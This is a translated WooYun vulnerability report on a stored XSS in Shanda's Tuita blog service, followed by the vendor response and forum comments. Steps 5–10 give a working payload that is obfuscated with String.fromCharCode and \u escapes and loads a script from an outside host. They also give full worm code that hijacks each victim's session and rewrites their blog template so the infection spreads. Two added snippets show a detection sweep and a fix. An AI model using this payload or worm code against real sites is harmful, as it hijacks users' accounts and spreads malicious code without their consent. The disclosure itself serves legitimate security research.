Vulnerability summary

Defect ID: wooyun-2012-010477

Title: Shanda - Tuita (推她) - Stored XSS

Vendor: Shanda Networks (盛大网络)

Author: gainover

Submitted: 2012-08-02 09:06

Fix time: 2012-09-16 09:06

Published: 2012-09-16 09:06

Type: XSS (cross-site scripting)

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Vulnerability details

Disclosure status:

2012-08-02: Details sent to the vendor, awaiting vendor response
2012-08-02: Vendor confirmed; details visible to the vendor only
2012-08-12: Details opened to core white hats and relevant domain experts
2012-08-22: Details opened to regular white hats
2012-09-01: Details opened to intern white hats
2012-09-16: Details opened to the public

Brief description:

A feature of Shanda's Tuita produces a stored XSS on the www.tuita.com domain. Combined with the light blog's custom-template feature, it can be turned into a worm. And since I'm male, the title says "推她" (push her) rather than 推他~~

Detailed description:

Tuita lets users customise the template of their blog page, but the account's real operations (posting, saving settings) are confined to the www.tuita.com main domain, so an XSS on that domain is what we need.
Content posted under a given tag is shown on that tag's page. For example:
Post anything at all and tag it wooyuntest.
It then shows up at http://www.tuita.com/tagpage/wooyuntest.
---------------------------------------
So if the posted content carries an XSS payload,
http://www.tuita.com/tagpage/wooyuntest
becomes an XSS page that we can exploit.
---------------------------------------
With that goal, we test the posted content for XSS:
1. First, publish a normal post:


2. Capture the request and look at what was sent:
URL: http://www.tuita.com/post/create
Method: POST
Data: see the screenshot.


3. The post_content field is JSON. When we append \u0022\u003E (the JSON escape form of the two characters ">) to the song_id property as a test, we find...


4. The result? Oh ho~~ it leaked: the decoded quote and bracket broke out of the attribute.


Once we know how it leaks, the rest is simple!
5. Build the closing payload. It closes the attribute and the <object> tag, adds an <img> whose onload creates a <script> element (the two String.fromCharCode calls decode to "script" and "http://itsokla.duapp.com/j.js"), then re-opens an <object> and an attribute to swallow the rest of the original markup:

"></object><img/src="http://www.baidu.com/img/baidu_sylogo1.gif"onload="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,105,116,115,111,107,108,97,46,100,117,97,112,112,46,99,111,109,47,106,46,106,115);document.body.appendChild(window.s)"><object><i a="


6. Encode it as \u escapes and put it into the request data:

{"PlayerFlashVar":"http:\/\/www.xiami.com\/widget\/0_376013\/singlePlayer.swf","song_id":"376013\u0022\u003e\u003c\u002f\u006f\u0062\u006a\u0065\u0063\u0074\u003e\u003c\u0069\u006d\u0067\u002f\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0062\u0061\u0069\u0064\u0075\u002e\u0063\u006f\u006d\u002f\u0069\u006d\u0067\u002f\u0062\u0061\u0069\u0064\u0075\u005f\u0073\u0079\u006c\u006f\u0067\u006f\u0031\u002e\u0067\u0069\u0066\u0022\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0073\u003d\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u0072\u0065\u0061\u0074\u0065\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0031\u0031\u0035\u002c\u0039\u0039\u002c\u0031\u0031\u0034\u002c\u0031\u0030\u0035\u002c\u0031\u0031\u0032\u002c\u0031\u0031\u0036\u0029\u0029\u003b\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0073\u002e\u0073\u0072\u0063\u003d\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0031\u0030\u0034\u002c\u0031\u0031\u0036\u002c\u0031\u0031\u0036\u002c\u0031\u0031\u0032\u002c\u0035\u0038\u002c\u0034\u0037\u002c\u0034\u0037\u002c\u0031\u0030\u0035\u002c\u0031\u0031\u0036\u002c\u0031\u0031\u0035\u002c\u0031\u0031\u0031\u002c\u0031\u0030\u0037\u002c\u0031\u0030\u0038\u002c\u0039\u0037\u002c\u0034\u0036\u002c\u0031\u0030\u0030\u002c\u0031\u0031\u0037\u002c\u0039\u0037\u002c\u0031\u0031\u0032\u002c\u0031\u0031\u0032\u002c\u0034\u0036\u002c\u0039\u0039\u002c\u0031\u0031\u0031\u002c\u0031\u0030\u0039\u002c\u0034\u0037\u002c\u0031\u0030\u0036\u002c\u0034\u0036\u002c\u0031\u0030\u0036\u002c\u0031\u0031\u0035\u0029\u003b\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0043\u0068\u0069\u006c\u0064\u0028\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0073\u0029\u0022\u003e\u003c\u006f\u0062\u006a\u0065\u0063\u0074\u003e\u003c\u0069\u0020\u0061\u003d\u0022","song_name":"\u56ed\u6e38\u4f1a","artist_id":"\u5468\u6770\u4f26","album_name":"\u4e03\u91cc\u9999","album_logo":{"55":"http:\/\/img.xiami.com\/.\/images\/album\/img60\/1260\/66481314675280_3.jpg","100":"http:\/\/img.xiami.com\/.\/images\/album\/img60\/1260\/66481314675280_1.jpg","185":"http:\/\/img.xiami.com\/.\/images\/album\/img60\/1260\/66481314675280_2.jpg","300":"http:\/\/img.xiami.com\/.\/images\/album\/img60\/1260\/66481314675280_4.jpg"},"audio_info":{"album_logo":null,"description":"<P>ok! look!<\/P>"}}


7. The payload above turns http://www.tuita.com/tagpage/wooyuntest into a page with a stored XSS; when a victim opens it, the contents of our external JS file run in the www.tuita.com origin.


8. There are two main ways to take the exploit further.
Method 1: push XSS-laden posts to the [hot tags] in bulk.
Method 2: in the template HTML of your own profile page, embed http://www.tuita.com/tagpage/wooyuntest in an iframe, so that anyone viewing your profile page is infected with the malicious code.
9. Method 2 in detail:
In my own Tuita template settings --> Custom HTML --> add an iframe just before </body>:

<iframe src="http://www.tuita.com/tagpage/test" style="display:none" id="wooyun"></iframe>


Then send http://1881056377.tuita.com/ to the victim.
When the victim opens the page, the malicious code in http://www.tuita.com/tagpage/test runs with the victim's session and inserts the same snippet into the victim's own template: <iframe src="http://www.tuita.com/tagpage/test" style="display:none" id="wooyun"></iframe>
10. The malicious code:
It uses the pkav library, see http://itsokla.duapp.com/pkav.js

if(pkav.is_domain("www.tuita.com")){
//tuita xss worm
//Re-post the XSS-laden xiami player post under the victim's blog (method 1; not called below)
function createPost(id){
pkav.post("http://www.tuita.com/post/create","post_title=%E5%9B%AD%E6%B8%B8%E4%BC%9A&post_content=%7B%22PlayerFlashVar%22%3A%22http%3A%5C%2F%5C%2Fwww.xiami.com%5C%2Fwidget%5C%2F0_376013%5C%2FsinglePlayer.swf%22%2C%22song_id%22%3A%22376013%5Cu0022%5Cu003e%5Cu003c%5Cu002f%5Cu006f%5Cu0062%5Cu006a%5Cu0065%5Cu0063%5Cu0074%5Cu003e%5Cu003c%5Cu0069%5Cu006d%5Cu0067%5Cu002f%5Cu0073%5Cu0072%5Cu0063%5Cu003d%5Cu0022%5Cu0068%5Cu0074%5Cu0074%5Cu0070%5Cu003a%5Cu002f%5Cu002f%5Cu0077%5Cu0077%5Cu0077%5Cu002e%5Cu0062%5Cu0061%5Cu0069%5Cu0064%5Cu0075%5Cu002e%5Cu0063%5Cu006f%5Cu006d%5Cu002f%5Cu0069%5Cu006d%5Cu0067%5Cu002f%5Cu0062%5Cu0061%5Cu0069%5Cu0064%5Cu0075%5Cu005f%5Cu0073%5Cu0079%5Cu006c%5Cu006f%5Cu0067%5Cu006f%5Cu0031%5Cu002e%5Cu0067%5Cu0069%5Cu0066%5Cu0022%5Cu006f%5Cu006e%5Cu006c%5Cu006f%5Cu0061%5Cu0064%5Cu003d%5Cu0022%5Cu0077%5Cu0069%5Cu006e%5Cu0064%5Cu006f%5Cu0077%5Cu002e%5Cu0073%5Cu003d%5Cu0064%5Cu006f%5Cu0063%5Cu0075%5Cu006d%5Cu0065%5Cu006e%5Cu0074%5Cu002e%5Cu0063%5Cu0072%5Cu0065%5Cu0061%5Cu0074%5Cu0065%5Cu0045%5Cu006c%5Cu0065%5Cu006d%5Cu0065%5Cu006e%5Cu0074%5Cu0028%5Cu0053%5Cu0074%5Cu0072%5Cu0069%5Cu006e%5Cu0067%5Cu002e%5Cu0066%5Cu0072%5Cu006f%5Cu006d%5Cu0043%5Cu0068%5Cu0061%5Cu0072%5Cu0043%5Cu006f%5Cu0064%5Cu0065%5Cu0028%5Cu0031%5Cu0031%5Cu0035%5Cu002c%5Cu0039%5Cu0039%5Cu002c%5Cu0031%5Cu0031%5Cu0034%5Cu002c%5Cu0031%5Cu0030%5Cu0035%5Cu002c%5Cu0031%5Cu0031%5Cu0032%5Cu002c%5Cu0031%5Cu0031%5Cu0036%5Cu0029%5Cu0029%5Cu003b%5Cu0077%5Cu0069%5Cu006e%5Cu0064%5Cu006f%5Cu0077%5Cu002e%5Cu0073%5Cu002e%5Cu0073%5Cu0072%5Cu0063%5Cu003d%5Cu0053%5Cu0074%5Cu0072%5Cu0069%5Cu006e%5Cu0067%5Cu002e%5Cu0066%5Cu0072%5Cu006f%5Cu006d%5Cu0043%5Cu0068%5Cu0061%5Cu0072%5Cu0043%5Cu006f%5Cu0064%5Cu0065%5Cu0028%5Cu0031%5Cu0030%5Cu0034%5Cu002c%5Cu0031%5Cu0031%5Cu0036%5Cu002c%5Cu0031%5Cu0031%5Cu0036%5Cu002c%5Cu0031%5Cu0031%5Cu0032%5Cu002c%5Cu0035%5Cu0038%5Cu002c%5Cu0034%5Cu0037%5Cu002c%5Cu0034%5Cu0037%5Cu002c%5Cu0031%5Cu0030%5Cu0035%5Cu002c%5Cu0031%5Cu0031%5Cu0036%5Cu002c%5Cu0031%5Cu0031%5Cu0035%5Cu002c%5Cu0031%5Cu0031%5Cu0031%5Cu002c%5Cu0031%5Cu0030%5Cu0037%5Cu002c%5Cu0031%5Cu0030%5Cu0038%5Cu002c%5Cu0039%5Cu0037%5Cu002c%5Cu0034%5Cu0036%5Cu002c%5Cu0031%5Cu0030%5Cu0030%5Cu002c%5Cu0031%5Cu0031%5Cu0037%5Cu002c%5Cu0039%5Cu0037%5Cu002c%5Cu0031%5Cu0031%5Cu0032%5Cu002c%5Cu0031%5Cu0031%5Cu0032%5Cu002c%5Cu0034%5Cu0036%5Cu002c%5Cu0039%5Cu0039%5Cu002c%5Cu0031%5Cu0031%5Cu0031%5Cu002c%5Cu0031%5Cu0030%5Cu0039%5Cu002c%5Cu0034%5Cu0037%5Cu002c%5Cu0031%5Cu0030%5Cu0036%5Cu002c%5Cu0034%5Cu0036%5Cu002c%5Cu0031%5Cu0030%5Cu0036%5Cu002c%5Cu0031%5Cu0031%5Cu0035%5Cu0029%5Cu003b%5Cu0064%5Cu006f%5Cu0063%5Cu0075%5Cu006d%5Cu0065%5Cu006e%5Cu0074%5Cu002e%5Cu0062%5Cu006f%5Cu0064%5Cu0079%5Cu002e%5Cu0061%5Cu0070%5Cu0070%5Cu0065%5Cu006e%5Cu0064%5Cu0043%5Cu0068%5Cu0069%5Cu006c%5Cu0064%5Cu0028%5Cu0077%5Cu0069%5Cu006e%5Cu0064%5Cu006f%5Cu0077%5Cu002e%5Cu0073%5Cu0029%5Cu0022%5Cu003e%5Cu003c%5Cu006f%5Cu0062%5Cu006a%5Cu0065%5Cu0063%5Cu0074%5Cu003e%5Cu003c%5Cu0069%5Cu0020%5Cu0061%5Cu003d%5Cu0022%22%2C%22song_name%22%3A%22%5Cu56ed%5Cu6e38%5Cu4f1a%22%2C%22artist_id%22%3A%22%5Cu5468%5Cu6770%5Cu4f26%22%2C%22album_name%22%3A%22%5Cu4e03%5Cu91cc%5Cu9999%22%2C%22album_logo%22%3A%7B%2255%22%3A%22http%3A%5C%2F%5C%2Fimg.xiami.com%5C%2F.%5C%2Fimages%5C%2Falbum%5C%2Fimg60%5C%2F1260%5C%2F66481314675280_3.jpg%22%2C%22100%22%3A%22http%3A%5C%2F%5C%2Fimg.xiami.com%5C%2F.%5C%2Fimages%5C%2Falbum%5C%2Fimg60%5C%2F1260%5C%2F66481314675280_1.jpg%22%2C%22185%22%3A%22http%3A%5C%2F%5C%2Fimg.xiami.com%5C%2F.%5C%2Fimages%5C%2Falbum%5C%2Fimg60%5C%2F1260%5C%2F66481314675280_2.jpg%22%2C%22300%22%3A%22http%3A%5C%2F%5C%2Fimg.xiami.com%5C%2F.%5C%2Fimages%5C%2Falbum%5C%2Fimg60%5C%2F1260%5C%2F66481314675280_4.jpg%22%7D%2C%22audio_info%22%3A%7B%22album_logo%22%3Anull%2C%22description%22%3A%22%3CP%3Eok%21+look%21%3C%5C%2FP%3E%22%7D%7D&post_type=xiami&blog_id="+id+"&sync_flag=0&syn=&post_tag=test&sticky=0&draft_id=451375&from=home&dtime=null",function(rs){
});
}
//Fetch the victim's template settings
function getSetting(id){
pkav.get("http://www.tuita.com/template/get?blog_id="+id+"&tsdump="+new Date().getTime(),function (rs){
var obj=eval("("+rs+")");
if(obj.data&&obj.data.tpl_html&&obj.data.tpl_html.indexOf("wooyun")==-1){
//Not infected yet: add the hidden iframe before </body> and save the template
obj.data.tpl_html=obj.data.tpl_html.replace(/<\/body>/,"<iframe src=\"http://www.tuita.com/tagpage/test\" style=\"display:none\" id=\"wooyun\"></iframe></body>");
saveSetting(id,obj);
}else{
try{
console.log("done!");
}catch(e){}
}
});
}
//Write the modified template back, using the victim's own session
function saveSetting(id,obj){
pkav.post("http://www.tuita.com/template/save","blog_id="+id+"&theme=0&custom_vars=%5B%7B%22name%22%3A%22%5Cu5c55%5Cu793a%5Cu5934%5Cu50cf%22%2C%22group%22%3A%22%5Cu8bbe%5Cu7f6e%22%2C%22type%22%3A%22boolean%22%2C%22value%22%3Atrue%2C%22reset%22%3Atrue%7D%2C%7B%22name%22%3A%22%5Cu5c55%5Cu793a%5Cu6211%5Cu5173%5Cu6ce8%5Cu7684%5Cu535a%5Cu5ba2%22%2C%22group%22%3A%22%5Cu8bbe%5Cu7f6e%22%2C%22type%22%3A%22boolean%22%2C%22value%22%3Atrue%2C%22reset%22%3Atrue%7D%2C%7B%22name%22%3A%22%5Cu5c55%5Cu793a%5Cu641c%5Cu7d22%5Cu6846%22%2C%22group%22%3A%22%5Cu8bbe%5Cu7f6e%22%2C%22type%22%3A%22boolean%22%2C%22value%22%3Atrue%2C%22reset%22%3Atrue%7D%5D&system_vars=%7B%22pagination_limit%22%3A%2210%22%7D&tpl_html="+encodeURIComponent(obj.data.tpl_html)+"&contribute_type=&contribute_tags=&contribute_rules=&contribute_save=1",function (rs){
try{
console.log("ok!");
}catch(e){}
});
}
//Find the victim's blog_id from the /blogsetting/<id> link on the home page
function getID(){
pkav.get("http://www.tuita.com/home?hash="+Math.random(),function(rs){
var id=pkav.fetch(rs,/http:\/\/www\.tuita\.com\/blogsetting\/(\d+)/);
getSetting(id);
//createPost(id);
});
}
//Run once per page load
if(!window.___x){
getID();
window.___x=1;
}
}


11. See the proof section for the effect.

Proof:

When a logged-in victim visits http://1881056377.tuita.com/, the victim's own blog gets infected too!
Victims who visited that address had the malicious code inserted into their own blog page as well; see the screenshot below:
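An added example for the response side of steps 9 and 10 above, written for this page rather than taken from gainover's worm or from Tuita's code: a sweep over stored templates that finds the worm's propagation vector, a frame of a www.tuita.com tag page inside a user template, and strips it. SAMPLE_TEMPLATES is constructed here; the only thing assumed about Tuita is what the worm itself relies on, that /template/get returns the template as plain HTML in tpl_html.

```javascript
'use strict';

// Constructed sample: blog_id -> tpl_html, shaped like the data field the
// worm reads from /template/get. Two templates carry the vector (one written
// in a different case and quoting), one embeds a harmless third-party player,
// one is clean.
const SAMPLE_TEMPLATES = {
  '1881056377':
    '<html><body><div id="posts"></div>' +
    '<iframe src="http://www.tuita.com/tagpage/test" style="display:none" id="wooyun"></iframe>' +
    '</body></html>',
  '1000000001': '<html><body><div id="posts"></div></body></html>',
  '1000000002':
    '<html><body><iframe src="http://player.youku.com/embed/XYZ" width="480" height="400"></iframe></body></html>',
  '1000000003':
    "<html><body><IFRAME SRC='http://www.tuita.com/tagpage/wooyuntest' STYLE='display: none; width:0'>" +
    '</IFRAME><p>hi</p></body></html>',
};

const IFRAME_RE = /<iframe\b[^>]*>(?:\s*<\/iframe\s*>)?/gi;
const SRC_RE = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;
const STYLE_RE = /\bstyle\s*=\s*(?:"([^"]*)"|'([^']*)')/i;

// Pull every <iframe> out of a template with its src and whether it is hidden.
function parseIframes(html) {
  return Array.from(html.matchAll(IFRAME_RE), (m) => {
    const tag = m[0];
    const src = SRC_RE.exec(tag);
    const style = STYLE_RE.exec(tag);
    const styleText = style ? (style[1] || style[2] || '') : '';
    return {
      tag,
      src: src ? (src[1] || src[2] || src[3] || '') : '',
      hidden: /display\s*:\s*none/i.test(styleText),
    };
  });
}

// The vector is any frame of a tag page on www.tuita.com, the origin whose
// session the XSS runs under. Hiding the frame is cosmetic, so visibility is
// reported but not used as the criterion.
function isTagpageFrame(src) {
  let u;
  try { u = new URL(src); } catch (e) { return false; }
  return (u.protocol === 'http:' || u.protocol === 'https:') &&
    u.hostname === 'www.tuita.com' && u.pathname.startsWith('/tagpage/');
}

function findWormFrames(html) {
  return parseIframes(html).filter((f) => isTagpageFrame(f.src));
}

// Sweep all stored templates and report the infected blog ids.
function scanTemplates(templates) {
  const hits = [];
  for (const [blogId, html] of Object.entries(templates)) {
    for (const f of findWormFrames(html)) hits.push({ blogId, src: f.src, hidden: f.hidden });
  }
  return hits;
}

// Remediation: remove the vector, leaving unrelated iframes untouched.
function disinfect(html) {
  let out = html;
  for (const f of findWormFrames(html)) out = out.split(f.tag).join('');
  return out;
}

const report = scanTemplates(SAMPLE_TEMPLATES);
console.log('infected blogs:', report);
console.log('cleaned 1881056377:', disinfect(SAMPLE_TEMPLATES['1881056377']));
```

The regexes are enough for triage on templates shaped like the ones the worm writes; a production sweep should parse the HTML properly, and the same criterion applies to any frame that points back at the origin holding the session cookie, not only /tagpage/.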

Fix:

Filter the song_id in post_content, and the other parameters as well (not tested, but likely affected the same way). Because the values arrive JSON-encoded, check them after decoding rather than on the raw request, and HTML-encode them when the tag page renders them.
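An added example, written for this page and not part of gainover's report or of Tuita's code, tying step 3 to the fix above: why a song_id carrying \u0022\u003e gets past a check on the raw request body, and what validating after decoding plus encoding at output time looks like. The tag-page markup, the raw-body filter and the shortened payload are assumptions; the report only shows that song_id lands inside an attribute of an <object> tag and that the JSON escape form gets through.

```javascript
'use strict';

// Encode every character as a JSON \uXXXX escape, the way step 6 encodes
// the closing payload before it goes into post_content.
function jsonUnicodeEscape(s) {
  return Array.from(s, (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0')).join('');
}

// Constructed: a shortened stand-in for the attacker's closing payload.
const INJECTED = '"></object><img/src="x"onerror="alert(1)"><object><i a="';
const SWF = 'http://www.xiami.com/widget/0_376013/singlePlayer.swf';

// Constructed raw bodies of the post_content field. LITERAL_BODY carries the
// markup as-is; ATTACK_BODY carries it only as \u escapes, so the raw text
// holds no '<' or '>' at all. Both decode to the same song_id.
const BENIGN_BODY = JSON.stringify({ PlayerFlashVar: SWF, song_id: '376013', song_name: 'test' });
const LITERAL_BODY = JSON.stringify({ PlayerFlashVar: SWF, song_id: '376013' + INJECTED, song_name: 'test' });
const ATTACK_BODY =
  '{"PlayerFlashVar":"' + SWF + '","song_id":"376013' + jsonUnicodeEscape(INJECTED) + '","song_name":"test"}';

// Assumed weak check: scan the raw body for tag characters before decoding.
function rawBodyHasTagChars(body) {
  return /[<>]/.test(body);
}

function decodedSongId(body) {
  return JSON.parse(body).song_id;
}

// Assumed vulnerable tag-page rendering: song_id is concatenated into an
// attribute of the <object> tag, the context the real payload closes.
function renderPlayerUnsafe(post) {
  return '<object type="application/x-shockwave-flash" data="' + post.PlayerFlashVar +
    '" id="song_' + post.song_id + '"></object>';
}

// Fix, part 1: validate the DECODED fields against what they may contain.
function isValidSongId(v) {
  return typeof v === 'string' && /^[0-9]{1,12}$/.test(v);
}
function acceptPost(body) {
  let post;
  try { post = JSON.parse(body); } catch (e) { return false; }
  return isValidSongId(post.song_id) && /^https?:\/\/www\.xiami\.com\//.test(String(post.PlayerFlashVar));
}

// Fix, part 2: encode for the attribute context at output time, whatever the
// stored value is, so records saved before the fix cannot break out either.
function escapeHtmlAttr(s) {
  return String(s).replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/'/g, '&#39;')
    .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}
function renderPlayerSafe(post) {
  return '<object type="application/x-shockwave-flash" data="' + escapeHtmlAttr(post.PlayerFlashVar) +
    '" id="song_' + escapeHtmlAttr(post.song_id) + '"></object>';
}

// Start-tag names in a rendered fragment: the unsafe render grows new elements.
function startTagNames(html) {
  return Array.from(html.matchAll(/<([a-zA-Z][a-zA-Z0-9]*)/g), (m) => m[1].toLowerCase());
}

console.log('raw filter catches literal body :', rawBodyHasTagChars(LITERAL_BODY));
console.log('raw filter catches escaped body :', rawBodyHasTagChars(ATTACK_BODY));
console.log('decoded song_id                 :', decodedSongId(ATTACK_BODY));
console.log('unsafe render tags              :', startTagNames(renderPlayerUnsafe(JSON.parse(ATTACK_BODY))));
console.log('safe render tags                :', startTagNames(renderPlayerSafe(JSON.parse(ATTACK_BODY))));
console.log('acceptPost attack/benign        :', acceptPost(ATTACK_BODY), acceptPost(BENIGN_BODY));
```

The two halves of the fix are independent: the allowlist on song_id stops the stored record from ever holding markup, and the output encoding protects the page even for fields that legitimately hold free text, such as song_name.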

Copyright notice: please credit gainover@WooYun when reposting.


Vendor response

Vendor reply:

Severity: High

Vulnerability Rank: 12

Confirmed at: 2012-08-02 09:14

Vendor comment:

Thanks to gainover for submitting this vulnerability report.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2012-08-02 09:10 | xsser Certified white hat ( Regular white hat | Rank:254 Vulns:18 | When I look back on all of it, will this world be alright?)

    Push her!

  2. 2012-08-02 09:21 | se55i0n ( Regular white hat | Rank:1567 Vulns:173 )

    Pushed her straight over~~

  3. 2012-08-02 09:22 | YunDay ( Passer-by | Rank:30 Vulns:4 | http://www.yunday.org)

    Do her!

  4. 2012-08-02 13:34 | 水滴 ( Regular white hat | Rank:146 Vulns:24 )

    @xsser @xsser Push her!

  5. 2012-09-01 12:22 | cnsars ( Passer-by | Rank:10 Vulns:4 | Still learning)

    So the OP is male...

  6. 2012-09-01 13:55 | 小胖子 Certified white hat ( Core white hat | Rank:1727 Vulns:140 | If only the sea could wash away my short, ugly...)

    Awesome, Chief Cross-Site Officer, that's you!!!

  7. 2012-09-03 10:47 | 网络小新 ( Passer-by | Rank:0 Vulns:2 | Professional newbie, long immersed in the ocean of infosec...)

    A true "kidney warrior" (肾斗士)!!!

  8. 2012-09-16 09:41 | 梧桐雨 Certified white hat ( Core white hat | Rank:1576 Vulns:184 | Into technology and network security)

    G-god sprang a leak.